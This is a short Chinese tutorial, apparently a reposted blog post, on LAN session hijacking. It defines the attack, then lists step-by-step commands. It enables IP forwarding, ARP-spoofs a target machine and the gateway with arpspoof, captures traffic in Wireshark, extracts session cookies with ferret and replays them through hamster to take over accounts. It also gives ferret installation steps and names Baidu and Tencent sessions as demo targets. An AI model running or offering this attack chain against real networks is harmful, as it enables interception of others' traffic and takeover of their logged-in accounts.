会话劫持-ferret获取cookie

#会话劫持(Session hijacking):

[v1 54tian]

这是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户,因此需要保证会话标识不被泄漏。

#原理再次说明

#案例演示:内网会话劫持(百度,腾讯等信息)

#相关操作命令:

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i 网卡接口(eth0) -t 目标机IP 网关IP  //欺骗目标机器

wireshark 抓包并导出pacp格式

ferret -r xxx.pacp(上一步生成的文件)

将生成的hamster.txt放置/root目录

hamster运行后设置本地浏览器代理

#关于ferret安装:

0.先添加源

leafpad /etc/apt/sources.list

https://blog.csdn.net/qq_34450601/article/details/80009095

1.添加对32位的支持

sudo dpkg --add-architecture i386

2.更新

sudo apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

3.安装ferret

sudo apt-get install aptitude

sudo aptitude install ferret-sidejack:i386

https://www.secpulse.com/archives/32859.html

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

http://app.myzaker.com/news/article.php?pk=5ba076fb77ac645c1d2e49c2

原文地址:https://www.cnblogs.com/trevain/p/13698927.html